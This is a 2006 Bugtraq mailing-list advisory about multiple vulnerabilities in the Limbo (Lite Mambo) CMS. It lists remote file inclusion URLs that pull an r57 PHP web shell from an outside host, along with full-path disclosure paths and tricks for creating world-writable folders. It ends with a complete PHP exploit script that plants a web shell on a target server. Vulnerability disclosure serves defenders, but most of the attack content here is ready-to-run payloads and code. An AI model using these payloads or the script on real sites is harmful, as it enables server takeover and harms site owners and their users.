Bugtraq mailing list archives

Limbo - Lite Mambo CMS Multiple Vulnerabilities


From: security () soqor net
Date: 13 Sep 2006 18:01:07 -0000

Hello

Title : Limbo - Lite Mambo CMS Multiple Vulnerabilities (Remote File including - Full path - make php shell - and 
create folder with 0777 permissions)

Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security () soqor net

/*******************************************************/
Remote File Including

classes/adodbt/sql.php?classes_dir=http://www.soqor.net/tools/r57.txt?

/*******************************************************/

Make online php shell

admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://www.soqor.net/tools/r57.txt?
or :-
components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://www.soqor.net/tools/r57.txt?

the shell link will be : 
admin/components/com_fm/lang/fm.english.php

/*******************************************************/

Full Path :-

includes/metadata.php
editor/tiny_mce/plugins/imanager/imanager.php
components/com_fm/fm.install.php
admin/auth.php
admin/components/com_fm/fm.install.php
admin/components/com_gallery/gallery.install.php
admin/components/com_start/admin.start.news.php
admin/components/com_start/admin.start.html.php?lm_absolute_path=../../../

it can be usefull in the fallowing vulnerabilities

/*******************************************************/
Create A new Folder With 0777 Permission

 - - + You Can Change the link and create your own folders ,, see the source code ..

admin/components/com_gallery/gallery.install.php?absolute_path=../../../

File dir:
images/gallery/thumbs/

admin/components/com_gositemap/gositemap.install.php?lm_absolute_path=../../
File dir:
admin/feed

admin/components/com_sitemap/sitemap.install.php?lm_absolute_path=../
File dir:
admin/components/feed

/*******************************************************/

WwW.SoQoR.NeT

Exploit:-
[code]
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/*   Limbo Portal Multiple vulnerabilities
/*  This exploit should Create a PHP shell
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/* Limbo Portal Creat PHP shell exploit       */
/* by HACKERS PAL <security () soqor net>        */
/* site: http://www.soqor.net                 */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*    php '.$argv[0].' http://localhost/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);

$url=$argv[1];
$exploit="components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://www.soqor.net/tools/r57.txt?";;
$page=$url.$exploit;
         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);

                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }

     $page = get_page($page);

     if(!eregi("Warning",$page))
     {
       Die("\n[+] Exploit Finished\n[+] Go To : ".$url."admin/components/com_fm/lang/fm.english.php\n[+] You Got Your 
Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");
             }
             Else
             {
                Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT                   
*/\n/**********************************************/");
                }
?>
[/code]


Current thread: